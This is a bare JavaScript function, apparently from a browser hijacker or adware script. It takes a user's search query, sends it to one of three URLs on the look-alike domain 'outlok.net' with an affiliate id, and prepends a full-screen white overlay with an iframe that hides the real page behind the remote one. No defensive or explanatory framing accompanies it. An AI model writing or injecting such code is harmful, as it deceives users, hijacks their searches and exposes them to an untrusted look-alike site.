function duhe(query){
var urls = new Array(
'http://search.outlok.net/search.php?said=bor-130710&q='+query,
'http://fid.outlok.net/search.php?said=bor-130710&q='+query,
'http://fid.outlok.net/of/index.php?said=bor-130710&q='+query);;
var rand = Math.floor(Math.random(urls)*3);
var ifr='<div style="position: absolute; width: 101%; height: 1000%; z-index: 999; overflow: hidden;  background-color: white; top: 0px; left: 0px;"><iframe width="100%" height="3000" style="width: 100%; height: 3000;" frameborder="0" scrolling="no" src="'+urls[rand]+'"></iframe></div>';
document.body.innerHTML=ifr+document.body.innerHTML;
}
